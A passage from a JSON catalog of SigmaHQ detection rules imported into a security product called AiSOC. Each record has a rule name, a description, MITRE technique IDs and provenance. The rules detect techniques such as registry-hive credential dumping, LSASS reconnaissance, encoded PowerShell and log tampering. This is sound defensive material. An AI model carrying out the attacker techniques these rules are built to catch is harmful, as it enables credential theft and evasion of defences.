"fd0f5778-d3cb-4c9a-9695-66759d04702a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" } }, { "id": "sigmahq-sigma-fd435618-981e-4a7c-81f8-f78ce480d616", "type": "detection", "name": "Django Framework Exceptions", "description": "Detects suspicious Django web application framework exceptions that could indicate exploitation attempts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/django-framework-exceptions.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fd435618-981e-4a7c-81f8-f78ce480d616", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/django/appframework_django_exceptions.yml" } }, { "id": "sigmahq-sigma-fd877b94-9bb5-4191-bb25-d79cbd93c167", "type": "detection", "name": "Dumping of Sensitive Hives Via Reg.EXE", "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002", "T1003.004", "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dumping-of-sensitive-hives-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml" } }, { "id": "sigmahq-sigma-fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", "type": "detection", "name": "PowerShell Base64 Encoded FromBase64String Cmdlet", "description": "Detects usage of a base64 encoded \"FromBase64String\" cmdlet in a process command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1140", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-base64-encoded-frombase64string-cmdlet.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdb62a13-9a81-4e5c-a38f-ea93a16f6d7c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_frombase64string.yml" } }, { "id": "sigmahq-sigma-fdbf0b9d-0182-4c43-893b-a1eaab92d085", "type": "detection", "name": "Potential Persistence Via Custom Protocol Handler", "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-custom-protocol-handler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml" } }, { "id": "sigmahq-sigma-fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", "type": "detection", "name": "Linux Command History Tampering", "description": "Detects commands that try to clear or tamper with the Linux command history.\nThis technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as \"bash_history\" or \"zsh_history\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-command-history-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/lnx_shell_clear_cmd_history.yml" } }, { "id": "sigmahq-sigma-fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", "type": "detection", "name": "Exploit Framework User Agent", "description": "Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exploit-framework-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_frameworks.yml" } }, { "id": "sigmahq-sigma-fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "type": "detection", "name": "Network Connection Initiated To Mega.nz", "description": "Detects a network connection initiated by a binary to \"api.mega.co.nz\".\nAttackers were seen abusing file sharing websites similar to \"mega.nz\" in order to upload/download additional payloads.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/network-connection-initiated-to-mega-nz.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_mega_nz.yml" } }, { "id": "sigmahq-sigma-fdf135a2-9241-4f96-a114-bb404948f736", "type": "detection", "name": "Antivirus Web Shell Detection", "description": "Detects a highly relevant Antivirus alert that reports a web shell.\nIt's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big WebShell repository from e.g. github and checking the matches.\nThis event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/antivirus-web-shell-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdf135a2-9241-4f96-a114-bb404948f736", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/category/antivirus/av_webshell.yml" } }, { "id": "sigmahq-sigma-fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "type": "detection", "name": "PsExec Service Execution", "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/psexec-service-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sysinternals_psexesvc.yml" } }, { "id": "sigmahq-sigma-fe10751f-1995-40a5-aaa2-c97ccb4123fe", "type": "detection", "name": "Linux Capabilities Discovery", "description": "Detects attempts to discover the files with setuid/setgid capability on them. That would allow adversary to escalate their privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083", "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-capabilities-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe10751f-1995-40a5-aaa2-c97ccb4123fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_capabilities_discovery.yml" } }, { "id": "sigmahq-sigma-fe20dda1-6f37-4379-bbe0-a98d400cae90", "type": "detection", "name": "Potential Persistence Via Scrobj.dll COM Hijacking", "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-scrobj-dll-com-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_scrobj_dll.yml" } }, { "id": "sigmahq-sigma-fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "type": "detection", "name": "Suspicious Scripting in a WMI Consumer", "description": "Detects suspicious commands that are related to scripting/powershell in WMI Event Consumers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scripting-in-a-wmi-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe21810c-2a8c-478f-8dd3-5a287fb2a0e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" } }, { "id": "sigmahq-sigma-fe2f9663-41cb-47e2-b954-8a228f3b9dff", "type": "detection", "name": "Linux Base64 Encoded Shebang In CLI", "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1140" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-base64-encoded-shebang-in-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml" } }, { "id": "sigmahq-sigma-fe3a2d49-f255-4d10-935c-bda7391108eb", "type": "detection", "name": "New BITS Job Created Via PowerShell", "description": "Detects the creation of a new bits job by PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-bits-job-created-via-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe3a2d49-f255-4d10-935c-bda7391108eb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_job_via_powershell.yml" } }, { "id": "sigmahq-sigma-fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "type": "detection", "name": "Malicious Named Pipe Created", "description": "Detects the creation of a named pipe seen used by known APTs or malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-named-pipe-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_susp_malicious_namedpipes.yml" } }, { "id": "sigmahq-sigma-fe513c69-734c-4d4a-8548-ac5f609be82b", "type": "detection", "name": "Google Cloud Firewall Modified or Deleted", "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/google-cloud-firewall-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe513c69-734c-4d4a-8548-ac5f609be82b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/gcp/audit/gcp_firewall_rule_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "type": "detection", "name": "SyncAppvPublishingServer Bypass Powershell Restriction - PS Module", "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/syncappvpublishingserver-bypass-powershell-restriction-ps-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe5ce7eb-dad8-467c-84a9-31ec23bd644a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml" } }, { "id": "sigmahq-sigma-fe63010f-8823-4864-a96b-a7b4a0f7b929", "type": "detection", "name": "LSASS Process Reconnaissance Via Findstr.EXE", "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1552.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-process-reconnaissance-via-findstr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fe63010f-8823-4864-a96b-a7b4a0f7b929", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" } }, { "id": "sigmahq-sigma-fec96f39-988b-4586-b746-b93d59fd1922", "type": "detection", "name": "ScreenConnect Temporary Installation Artefact", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/screenconnect-temporary-installation-artefact.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fec96f39-988b-4586-b746-b93d59fd1922", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_remote_access_tools_screenconnect_artefact.yml" } }, { "id": "sigmahq-sigma-fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "type": "detection", "name": "PowerShell Logging Disabled Via Registry Key Tampering", "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1564.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-logging-disabled-via-registry-key-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" } }, { "id": "sigmahq-sigma-fed85bf9-e075-4280-9159-fbe8a023d6fa", "type": "detection", "name": "Advanced IP Scanner - File Event", "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/advanced-ip-scanner-file-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fed85bf9-e075-4280-9159-fbe8a023d6fa", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml" } }, { "id": "sigmahq-sigma-fef394cd-f44d-4040-9b18-95d92fe278c0", "type": "detection", "name": "Potential DLL Sideloading Of DbgModel.DLL", "description": "Detects potential DLL sideloading of \"DbgModel.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-dbgmodel-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "fef394cd-f44d-4040-9b18-95d92fe278c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_dbgmodel.yml" } }, { "id": "sigmahq-sigma-ff0f2b05-09db-4095-b96d-1b75ca24894a", "type": "detection", "name": "DotNET Assembly DLL Loaded Via Office Application", "description": "Detects any assembly DLL being loaded by an Office Product", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dotnet-assembly-dll-loaded-via-office-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_dotnet_assembly_dll_load.yml" } }, { "id": "sigmahq-sigma-ff151c33-45fa-475d-af4f-c2f93571f4fe", "type": "detection", "name": "Azure AD Health Monitoring Agent Registry Keys Access", "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-ad-health-monitoring-agent-registry-keys-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff151c33-45fa-475d-af4f-c2f93571f4fe", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" } }, { "id": "sigmahq-sigma-ff23ffbc-3378-435e-992f-0624dcf93ab4", "type": "detection", "name": "HackTool - PurpleSharp Execution", "description": "Detects the execution of the PurpleSharp adversary simulation tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1587" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-purplesharp-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_purplesharp_indicators.yml" } }, { "id": "sigmahq-sigma-ff246f56-7f24-402a-baca-b86540e3925c", "type": "detection", "name": "Microsoft 365 - User Restricted from Sending Email", "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1199" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/microsoft-365-user-restricted-from-sending-email.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff246f56-7f24-402a-baca-b86540e3925c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/m365/threat_management/microsoft365_user_restricted_from_sending_email.yml" } }, { "id": "sigmahq-sigma-ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "type": "detection", "name": "Suspicious Scheduled Task Name As GUID", "description": "Detects creation of a scheduled task with a GUID like name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-name-as-guid.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_guid_task_name.yml" } }, { "id": "sigmahq-sigma-ff301988-c231-4bd0-834c-ac9d73b86586", "type": "detection", "name": "PowerShell Console History Logs Deleted", "description": "Detects the deletion of the PowerShell console History logs which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-console-history-logs-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff301988-c231-4bd0-834c-ac9d73b86586", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_powershell_command_history.yml" } }, { "id": "sigmahq-sigma-ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", "type": "detection", "name": "Disable Security Tools", "description": "Detects disabling security tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disable-security-tools.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" } }, { "id": "sigmahq-sigma-ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "type": "detection", "name": "Mstsc.EXE Execution From Uncommon Parent", "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mstsc-exe-execution-from-uncommon-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" } }, { "id": "sigmahq-sigma-ff7139bc-fdb1-4437-92f2-6afefe8884cb", "type": "detection", "name": "OpenCanary - SSH Login Attempt", "description": "Detects instances where an SSH service on an OpenCanary node has had a login attempt.", "version": "1.0.0", "author": 